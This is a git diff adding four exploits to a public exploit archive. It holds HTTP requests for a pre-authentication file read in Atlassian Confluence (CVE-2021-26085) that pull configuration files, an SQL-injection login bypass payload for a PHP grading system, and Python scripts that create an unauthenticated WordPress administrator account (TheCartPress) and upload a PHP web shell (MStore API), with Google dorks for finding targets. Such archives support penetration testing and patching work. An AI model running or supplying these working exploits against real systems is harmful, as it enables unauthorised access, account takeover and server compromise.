diff --git a/exploits/java/webapps/50377.txt b/exploits/java/webapps/50377.txt new file mode 100644 index 000000000..fe0432d29 --- /dev/null +++ b/exploits/java/webapps/50377.txt @@ -0,0 +1,56 @@ +# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read +# Date: 2021-10-05 +# Exploit Author: Mayank Deshmukh +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/confluence/download-archives +# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3 +# Tested on: Kali Linux & Windows 10 +# CVE : CVE-2021-26085 + +POC #1 - web.xml + +GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1 +Host: 127.0.0.1:8090 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC #2 - seraph-config.xml + +GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 +Host: 127.0.0.1:8090 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC #3 - pom.properties + +GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1 +Host: 127.0.0.1:8090 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +POC #4 - pom.xml + +GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1 +Host: 127.0.0.1:8090 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/50376.txt b/exploits/php/webapps/50376.txt new file mode 100644 index 000000000..5c1b9ccb3 --- /dev/null +++ b/exploits/php/webapps/50376.txt @@ -0,0 +1,37 @@ +# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass +# Date: 04.10.2021 +# Exploit Author: Blackhan +# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. + +Steps To Reproduce: +1 - Go to the login page http://localhost/grading_system/login.php +2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field. +3 - Click on "Login" button and you are logged in as administrator. + +PoC + +POST /grading_system/Actions.php?a=login HTTP/1.1 +Host: localhost +Content-Length: 45 +sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/grading_system/login.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j +Connection: close + +username=bypass'+or+1%3D1--+-&password=bypass \ No newline at end of file diff --git a/exploits/php/webapps/50378.py b/exploits/php/webapps/50378.py new file mode 100755 index 000000000..ebbf10783 --- /dev/null +++ b/exploits/php/webapps/50378.py @@ -0,0 +1,65 @@ +# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated) +# Google Dork: inurl:/wp-content/plugins/thecartpress/ +# Date: 04/10/2021 +# Exploit Author: spacehen +# Vendor Homepage: https://wordpress.org/plugin/thecartpress +# Version: <= 1.5.3.6 +# Tested on: Ubuntu 20.04.1 + +import os.path +from os import path +import json +import requests; +import sys + +def print_banner(): + print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation") + print("Author -> space_hen (www.github.com/spacehen)") + +def print_usage(): + print("Usage: python3 exploit.py [target url]") + print("Ex: python3 exploit.py https://example.com") + +def vuln_check(uri): + response = requests.get(uri) + raw = response.text + if ("User name is required" in raw): + return True; + else: + return False; + +def main(): + + print_banner() + if(len(sys.argv) != 2): + print_usage(); + sys.exit(1); + + base = sys.argv[1] + + ajax_action = 'tcp_register_and_login_ajax' + admin = '/wp-admin/admin-ajax.php'; + + uri = base + admin + '?action=' + ajax_action ; + check = vuln_check(uri); + + if(check == False): + print("(*) Target not vulnerable!"); + sys.exit(1) + + data = { + "tcp_new_user_name" : "admin_02", + "tcp_new_user_pass" : "admin1234", + "tcp_repeat_user_pass" : "admin1234", + "tcp_new_user_email" : "test@test.com", + "tcp_role" : "administrator" + } + print("Inserting admin..."); + response = requests.post(uri, data=data ) + if (response.text == "\"\""): + print("Success!") + print("Now login at /wp-admin/") + else: + print(response.text) + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/50379.py b/exploits/php/webapps/50379.py new file mode 100755 index 000000000..a9d62024f --- /dev/null +++ b/exploits/php/webapps/50379.py @@ -0,0 +1,62 @@ +# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload +# Google Dork: inurl:/wp-content/plugins/mstore-api/ +# Date: 22/09/2021 +# Exploit Author: spacehen +# Vendor Homepage: https://wordpress.org/plugins/mstore-api/ +# Version: 2.0.6, possibly higher +# Tested on: Ubuntu 20.04.1 + +import os.path +from os import path +import json +import requests; +import sys + +def print_banner(): + print("MStore API < 2.0.6 - Arbitrary File Upload") + print("Author -> space_hen (www.github.com/spacehen)") + +def print_usage(): + print("Usage: python3 exploit.py [target url] [shell path]") + print("Ex: python3 exploit.py https://example.com ./shell.php") + +def vuln_check(uri): + response = requests.post(uri) + raw = response.text + + if ("Key must be" in raw): + return True; + else: + return False; + +def main(): + + print_banner() + if(len(sys.argv) != 3): + print_usage(); + sys.exit(1); + + base = sys.argv[1] + file_path = sys.argv[2] + + rest_url = '/wp-json/api/flutter_woo/config_file' + + uri = base + rest_url; + check = vuln_check(uri); + + if(check == False): + print("(*) Target not vulnerable!"); + sys.exit(1) + + if( path.isfile(file_path) == False): + print("(*) Invalid file!") + sys.exit(1) + + files = {'file' : ( "config.json.php", open(file_path), "application/json" )} + + print("Uploading shell..."); + response = requests.post(uri, files=files ) + # response should be location of file + print(response.text) + +main(); \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 78209f7af..52036d535 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44488,3 +44488,7 @@ id,file,description,date,author,type,platform,port 50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple, 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php, 50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php, +50376,exploits/php/webapps/50376.txt,"Student Quarterly Grading System 1.0 - SQLi Authentication Bypass",1970-01-01,Blackhan,webapps,php, +50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java, +50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php, +50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,